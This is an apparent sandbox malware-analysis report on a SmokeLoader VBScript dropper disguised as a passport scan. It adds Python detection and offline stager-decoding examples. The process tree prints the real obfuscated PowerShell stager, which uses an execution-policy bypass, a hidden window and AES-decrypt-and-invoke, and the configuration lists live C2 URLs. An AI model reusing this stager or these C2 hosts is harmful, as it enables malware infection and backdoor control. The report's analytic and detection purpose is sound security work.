Windows Analysis Report
Скан-копiя Паспорт.vbs (file name decoded from its #Uxxxx escapes; Ukrainian, roughly "Scan copy Passport", with a Latin i in копiя)
Overview
General Information
Sample name: | Скан-копiя Паспорт.vbs (renamed because the original name is a hash value) |
Original sample name: | -i .vbs |
Analysis ID: | 1578026 |
MD5: | dd180ea4a76b4ac987ffc4f4cb42e5ee |
SHA1: | 645da4bd0a0cc94694fde162126e8dd62208168b |
SHA256: | ea0a7467efc74d7a947774d83d440426510243bd4b443391f753902bf275c86c |
Tags: | vbs, user-abuse_ch |
Detection
SmokeLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
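The Sigma and behaviour signatures above describe one execution chain: a script host spawning PowerShell with an insecure execution policy and a hidden window, a very long command line that decrypts its next stage in memory and invokes the result, and a dropped PE launched from AppData\Roaming. The script below turns those signatures into correlation logic over process-creation events. It is an added example, not part of the Joe Sandbox report and not any vendor's rule; the events are constructed Sysmon-style records (Image, ParentImage, CommandLine, ProcessId, ParentProcessId) whose PIDs 6768, 2868 and 1664 follow the report, while the desktop explorer.exe parent PID 1234, the filler ciphertext and the 1000-character length threshold are assumptions.

```python
"""Detection pass over the execution chain described by the report's signatures.

Added example (not part of the Joe Sandbox report, not a vendor rule).
Event records below are constructed Sysmon-style process-creation events.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
LONG_CMDLINE = 1000  # assumption; the report's stager is over 1,600 characters

# Command-line indicators, each tied to the report signature it approximates.
INDICATORS = [
    # "Sigma detected: Change PowerShell Policies to an Insecure Level"
    ("insecure execution policy",
     re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+(?:unrestricted|bypass)\b", re.I)),
    # "-w 1" is -WindowStyle Hidden
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I)),
    ("no profile", re.compile(r"-nop(?:rofile)?\b", re.I)),
    # "Suspicious powershell command line found": decrypt in memory ...
    ("in-memory AES decrypt", re.compile(r"createdecryptor|transformfinalblock", re.I)),
    # ... then use the call operator on a string that only exists after decryption
    ("dynamic invoke of decoded string", re.compile(r"&\s*\$\w+\.substring\(", re.I)),
]
HIGH_SIGNAL = {"script host spawned shell", "in-memory AES decrypt",
               "dynamic invoke of decoded string", "executable launched from AppData\\Roaming"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Indicators that fire for a single process-creation event."""
    image, parent, cmd = basename(event["Image"]), basename(event["ParentImage"]), event["CommandLine"]
    hits = []
    # "Wscript starts Powershell (via cmd or directly)" / "WScript or CScript Dropper"
    if parent in SCRIPT_HOSTS and (image in POWERSHELL or image == "cmd.exe"):
        hits.append("script host spawned shell")
    if image in POWERSHELL:
        hits.extend(name for name, rx in INDICATORS if rx.search(cmd))
        if len(cmd) > LONG_CMDLINE:  # "Very long cmdline option found"
            hits.append("very long command line")
    # "Powershell drops PE file" followed by execution of the drop
    if parent in POWERSHELL and "\\appdata\\roaming\\" in event["Image"].lower():
        hits.append("executable launched from AppData\\Roaming")
    return hits


def chain_hits(events):
    """Union of indicators along each process's ancestry (root first), so a dropped binary
    inherits the wscript -> powershell context ("Suspicious execution chain found")."""
    by_pid = {e["ProcessId"]: e for e in events}
    own = {pid: evaluate(e) for pid, e in by_pid.items()}
    result = {}
    for pid in by_pid:
        chain, cur = [], pid
        while cur in by_pid and cur not in chain:
            chain.append(cur)
            cur = by_pid[cur]["ParentProcessId"]
        hits = []
        for p in reversed(chain):
            hits.extend(h for h in own[p] if h not in hits)
        result[pid] = hits
    return result


def is_alert(hits):
    """'-nop' or a hidden window alone is routine admin tooling; alert only when a
    high-signal indicator appears together with at least two other flags in the chain."""
    return len(hits) >= 3 and any(h in HIGH_SIGNAL for h in hits)


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
STAGER_CMD = (  # shape of the report's stager; the hex blob is constructed filler
    f'"{PS}" -w 1 -ep Unrestricted -nop '
    "function raNdD($EzfV){return -split ($EzfV -replace '..', '0x$& ')};"
    "$UNmWG = raNdD('" + "15362247" * 160 + "');"
    "$cvlPy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor("
    "(raNdD('5A456A634B52506273785A52424C5375')),[byte[]]::new(16))"
    ".TransformFinalBlock($UNmWG,0,$UNmWG.Length)); & $cvlPy.Substring(0,3) $cvlPy.Substring(3)"
)
EVENTS = [  # constructed records; explorer.exe PID 1234 is invented
    {"ProcessId": 6768, "ParentProcessId": 1234, "Image": "C:\\Windows\\System32\\wscript.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": 'C:\\Windows\\System32\\WScript.exe "C:\\Users\\user\\Desktop\\Скан-копiя Паспорт.vbs"'},
    {"ProcessId": 2868, "ParentProcessId": 6768, "Image": PS,
     "ParentImage": "C:\\Windows\\System32\\wscript.exe", "CommandLine": STAGER_CMD},
    {"ProcessId": 1664, "ParentProcessId": 2868, "Image": "C:\\Users\\user\\AppData\\Roaming\\putty.exe",
     "ParentImage": PS, "CommandLine": '"C:\\Users\\user\\AppData\\Roaming\\putty.exe"'},
    {"ProcessId": 5100, "ParentProcessId": 1234, "Image": PS,  # benign control event
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": f'"{PS}" -NoProfile -Command Get-Date'},
]

if __name__ == "__main__":
    for pid, hits in chain_hits(EVENTS).items():
        print(pid, "ALERT" if is_alert(hits) else "ok", hits)
```

The chain join is what keeps the rule quiet on the benign control event (a console started from the desktop with -NoProfile) while still alerting on putty.exe, whose own record shows nothing more than a binary run from AppData\Roaming until its ancestry is added.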
Classification

Process Tree
- System is w10x64
- wscript.exe (PID: 6768 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Скан-копiя Паспорт.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 2868 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function raNdD($EzfV){return -split ($EzfV -replace '..', '0x$& ')};$UNmWG = raNdD('153622473F3D34B5890B52ECDE322F45E48AC8AA1EBE0731587B2A8D1EB5D7236A3C8B617FAE24809377210FCDAA8256B284412DD11EC0B51122B1EF9F3232128A30DA876225B23A0A21033A7E42AB95CC5ACD28D3BAC87A3C04863F7224792517962091F8B92DF84D8699F4A63BB1EACD4E7F895F70B40175EDCBD0858EC7333AE6A1AB73D0F0C2C360B3826EBCACACB9561C41AF524F59C7FE7200CFE0C18E7CBE012252D4DA348D9867636DE8BE7309771296CCEA63DC8A00F1A6607291A9D940AC0FBE016E1469B44FFC93FB881EE1B5B55931B83474C09BA7D8326E069F30F7EF3AD15149CE314DEBF42606E2068557F79F77A379EAF734C27C2D3B854DBC0DC2752FBB6A8E67A31EF7EC67BD5A9B6BBC6B643AC644B7231B34788E58522EE2FF086384D09C1974CF97199996486FD9081C9C03779BC054D7DBD1AE0F032973099215905B2991EEDE39D374557E6BF7E27D2284AB23157862E2CBB4C7F31D6EA0F0594CBE9A410EBAA90180045174CFB119CD292B770AC51A76BD48FEDA376633D5D95F3C12FCD9A75FDD9D0DBDE8551877FA8C38E86B9D006E2A51E2D327743DB0EBECEA698C101441CF173D4614D44DAA2F4802C84FA83BDCB67CCFB31C07AB202A98C6B54200BBAEE17899ED11E5B03E97ADD428647A41B73BF380058DE3A0F98E978F9B83CAB3C28FE019C43A7BB0D040D5CCD700B059F3734BD804AE813EC4E10D1EA58FCBB0EC6C4C8CDE60CD35C6D4012EECE60D1A1EB2466BE1E327B203A6FEADD590E2D7A77C218709D3259C666B281C8D292197492CB5078DC69512F5FE4EA4467A62B291A42BF5576D12E86AAA0AFEB464D865F88ADAAB7D71DEBE3FE860AA8D5C1DC08F163020FD6DF7298ABF82642D73139A20C305891AC189D3EBB5DE86DD02CABDB425F68BC4');$cvlPy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((raNdD('5A456A634B52506273785A52424C5375')),[byte[]]::new(16)).TransformFinalBlock($UNmWG,0,$UNmWG.Length)); & $cvlPy.Substring(0,3) $cvlPy.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
    - conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    - putty.exe (PID: 1664 cmdline: "C:\Users\user\AppData\Roaming\putty.exe" MD5: C02B57E6771A13513DC087F6B45ADAB0)
      - explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
- daersgt (PID: 2236 cmdline: C:\Users\user\AppData\Roaming\daersgt MD5: C02B57E6771A13513DC087F6B45ADAB0)
- cleanup

The command lines above are shown unwrapped. Note that daersgt in %AppData%\Roaming carries the same MD5 as putty.exe, so it is a renamed copy of the dropped loader rather than a second payload.
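The PowerShell stage in the tree never writes its next stage to disk: raNdD() rewrites every hex pair as "0xNN " and splits it into an array that PowerShell coerces to bytes, [Aes]::Create() gives AES with the .NET defaults (CBC mode, PKCS7 padding), CreateDecryptor receives the 16-byte key from the second hex literal and a 16-byte all-zero IV ([byte[]]::new(16)), the plaintext bytes are cast to [char[]] and joined, and the call operator runs the first three characters as a command with the remainder as its argument. The ciphertext literal is 1,312 hex digits, 656 bytes or 41 AES-128 blocks, which the block-alignment check below confirms. The script recovers the plaintext without executing it. It is an added example, not report or SmokeLoader code, and needs the third-party cryptography package; because the real ciphertext's plaintext is not on this page, build_constructed_sample() encrypts an invented next stage (the "iexWrite-Host ..." string is an assumption) under the report's key literal so the round trip can be checked offline, and the same decode_stager() accepts the real command line from the tree above.

```python
"""Offline decoder for the AES-wrapped PowerShell stager shown in the process tree.

Added example (not part of the Joe Sandbox report, not SmokeLoader code).
Requires the third-party `cryptography` package.
"""
import re

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# The hex literal passed to CreateDecryptor(...) is the AES key ...
KEY_RX = re.compile(r"CreateDecryptor\(\(?\w+\('([0-9A-Fa-f]+)'\)")
# ... every other long hex literal in the one-liner is ciphertext.
HEX_RX = re.compile(r"\('([0-9A-Fa-f]{32,})'\)")
ZERO_IV = bytes(16)  # the stager passes [byte[]]::new(16): sixteen zero bytes


def extract_blobs(cmdline):
    """Return (ciphertext, key) as bytes, with the sanity checks an analyst does by eye."""
    m = KEY_RX.search(cmdline)
    if not m:
        raise ValueError("no CreateDecryptor(<hexfn>('...')) call in command line")
    key = bytes.fromhex(m.group(1))  # same conversion raNdD() performs on the key literal
    if len(key) not in (16, 24, 32):
        raise ValueError(f"{len(key)}-byte key is not an AES key size")
    others = [h for h in HEX_RX.findall(cmdline) if h != m.group(1)]
    if len(others) != 1:
        raise ValueError(f"expected one ciphertext literal, found {len(others)}")
    ct = bytes.fromhex(others[0])
    if len(ct) % 16:
        raise ValueError("ciphertext is not a multiple of the AES block size")
    return ct, key


def aes_cbc_decrypt(ct, key, iv=ZERO_IV):
    """[Aes]::Create() defaults in .NET: CBC mode with PKCS7 padding."""
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = dec.update(ct) + dec.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    return unpadder.update(padded) + unpadder.finalize()


def decode_stager(cmdline):
    """Split the plaintext the way '& $s.Substring(0,3) $s.Substring(3)' would,
    returning (command, argument) instead of invoking them."""
    ct, key = extract_blobs(cmdline)
    # '-join [char[]]' maps each byte to the char with that code point: latin-1.
    plaintext = aes_cbc_decrypt(ct, key).decode("latin-1")
    return plaintext[:3], plaintext[3:]


def build_constructed_sample(plaintext, key):
    """Encrypt an invented next stage and wrap it in the stager's syntax (test input only)."""
    padder = padding.PKCS7(128).padder()
    padded = padder.update(plaintext.encode("latin-1")) + padder.finalize()
    enc = Cipher(algorithms.AES(key), modes.CBC(ZERO_IV)).encryptor()
    ct = enc.update(padded) + enc.finalize()
    return (
        "powershell.exe -w 1 -ep Unrestricted -nop "
        "function raNdD($EzfV){return -split ($EzfV -replace '..', '0x$& ')};"
        f"$UNmWG = raNdD('{ct.hex().upper()}');"
        "$cvlPy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor("
        f"(raNdD('{key.hex().upper()}')),[byte[]]::new(16)).TransformFinalBlock($UNmWG,0,$UNmWG.Length)); "
        "& $cvlPy.Substring(0,3) $cvlPy.Substring(3)"
    )


REPORT_KEY = bytes.fromhex("5A456A634B52506273785A52424C5375")  # the key literal from the report

if __name__ == "__main__":
    # Constructed plaintext: the real sample's next stage is not on this page.
    sample = build_constructed_sample("iexWrite-Host 'stage two'", REPORT_KEY)
    print(decode_stager(sample))  # ('iex', "Write-Host 'stage two'")
```

To apply it to the sample itself, pass the unwrapped powershell.exe command line from the process tree to decode_stager(); extract_blobs() will reject the input before any decryption if the key or ciphertext lengths do not fit AES, which is the quickest way to catch a transcription error in a 1,312-digit hex string.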
Malware Configuration
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
SmokeLoader | The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body. | | | |

Extracted configuration:
{"Version": 2022, "C2 list": ["http://constractionscity1991.lat/", "http://restructurisationservice.ru/", "http://connecticutproperty.ru/"]}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | |
| Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | |
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | |
| Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | |
| Windows_Trojan_Smokeloader_3687686f | unknown | unknown | |
(Source column empty in the extracted report; 10 more entries collapsed)
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | |
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | |
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | |
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | |
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | |
(Source column empty in the extracted report; 1 more entry collapsed)
System Summary |
---|
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community |
Source: | Author: frack113 |